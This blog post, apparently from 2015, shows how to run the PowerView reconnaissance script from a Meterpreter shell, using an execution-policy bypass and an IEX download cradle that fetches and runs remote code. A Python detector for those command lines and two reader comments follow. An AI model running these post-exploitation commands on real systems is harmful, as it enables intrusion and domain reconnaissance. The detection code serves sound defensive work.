Monday, February 23, 2015

Running PowerShell Scripts That Require Module Imports With Meterpreter

Old post on the subject here:

More recent posts on the subject by harmj0y

Anyway, option #2 from The PowerShell Weaponization Problem works fine if you don't care about the script being on disk.

Gist with the command

meterpreter > shell
Process 2380 created.
Channel 4 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\user\Desktop>powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"

Via the IEX download method (gist with the command):

C:\Users\user\Desktop>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString(''); Get-NetDomain"
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString(''); Get-NetDomain"
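The two invocations above leave different traces for a defender: the Import-Module variant references a .ps1 that is sitting on disk and can be collected, while the IEX DownloadString variant never writes the script out, so process-creation command lines, ScriptBlock logging and network telemetry are what remain. Here is a small Python detector, added as an example (it is not from the original post, nor from PowerView or Metasploit), that runs over constructed process-creation records shaped like a Sysmon Event ID 1 / Security 4688 export and flags both patterns. The pids, parent images and the download URL in the sample are placeholders; a bare -exec bypass on its own is scored low because it only sets the execution policy for that one process (it is not a security boundary, and administrators use it too).

```python
"""Flag process-creation command lines that use the two PowerShell
invocation patterns shown in the post (on-disk Import-Module, in-memory
IEX download cradle). Added example; the sample events are constructed."""
import re
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Finding:
    pid: int
    parent: str
    severity: str                       # "high" or "low"
    indicators: list = field(default_factory=list)
    script_path: Optional[str] = None   # captured for the on-disk variant


# Constructed records in the shape of a Sysmon Event ID 1 / Security 4688
# export: (pid, parent image, command line). None of these come from a real
# host; the download URL is a placeholder (the post leaves it blank).
SAMPLE_EVENTS = [
    (2380, r"C:\Windows\System32\cmd.exe",
     "powershell.exe -exec bypass -Command \"& {Import-Module "
     "'C:\\Users\\user\\Desktop\\PowerTools\\PowerView\\powerview.ps1'; Get-NetDomain}\""),
    (2391, r"C:\Windows\System32\cmd.exe",
     "powershell.exe -exec bypass -Command \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://PLACEHOLDER.invalid/powerview.ps1'); Get-NetDomain\""),
    (2402, r"C:\Windows\explorer.exe",
     "powershell.exe -NoProfile -File C:\\Scripts\\nightly-backup.ps1"),
    (2415, r"C:\Windows\System32\cmd.exe",
     "powershell.exe -ExecutionPolicy Bypass -Command \"Get-Date\""),
]

# powershell.exe accepts any unambiguous prefix of -ExecutionPolicy, so
# "-ep", "-ex" and "-exec" all work; match them all, case-insensitively.
RE_EXEC_BYPASS = re.compile(r"-e(?:p|x[a-z]*)\s+bypass", re.I)
# Import-Module (or its ipmo alias) pointing at a .ps1/.psm1/.psd1 on disk.
RE_IMPORT_FROM_DISK = re.compile(
    r"(?:Import-Module|ipmo)\s+['\"]?([A-Za-z]:\\[^'\";]+?\.ps[md]?1)", re.I)
# IEX / Invoke-Expression fed by Net.WebClient.DownloadString: nothing lands on disk.
RE_DOWNLOAD_CRADLE = re.compile(
    r"(?:IEX|Invoke-Expression)\b.*Net\.WebClient.*DownloadString\s*\(", re.I | re.S)


def classify(cmdline: str):
    """Return (indicators, script_path) for one command line."""
    indicators, path = [], None
    if RE_EXEC_BYPASS.search(cmdline):
        indicators.append("execpolicy_bypass")
    m = RE_IMPORT_FROM_DISK.search(cmdline)
    if m:
        indicators.append("import_module_from_disk")
        path = m.group(1)
    if RE_DOWNLOAD_CRADLE.search(cmdline):
        indicators.append("download_cradle")
    return indicators, path


def scan(events):
    """Map pid -> Finding for every PowerShell event that trips an indicator.
    An execution-policy bypass alone is low severity (per-process setting,
    not a security boundary); a module load from disk or a download cradle
    makes the event high severity."""
    strong = {"import_module_from_disk", "download_cradle"}
    findings = {}
    for pid, parent, cmdline in events:
        if "powershell" not in cmdline.lower():
            continue
        indicators, path = classify(cmdline)
        if not indicators:
            continue
        severity = "high" if strong & set(indicators) else "low"
        findings[pid] = Finding(pid, parent, severity, indicators, path)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS).values():
        print(f"pid {f.pid} [{f.severity}] {', '.join(f.indicators)}"
              + (f" -> collect {f.script_path}" if f.script_path else ""))
```

Run as-is it reports the two invocations from the post as high severity (with the on-disk path captured for collection), the -ExecutionPolicy Bypass Get-Date event as low, and ignores the scheduled-script event; pointing it at a real export means replacing SAMPLE_EVENTS with tuples pulled from your log pipeline.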



OJ said...

Executing PowerShell through Meterpreter is a hot discussion topic at the moment. A few people are pondering options and I'm playing with a couple of ideas to make this a little nicer. It might be nice to have a command that sits alongside "shell", called "powershell", that just gives you an interactive PS prompt. This might have to be done via a new extension though, given that it'd probably require automation of PS rather than shelling out to it and mucking with std handles.

So watch this space!

CG said...

yes plz :-)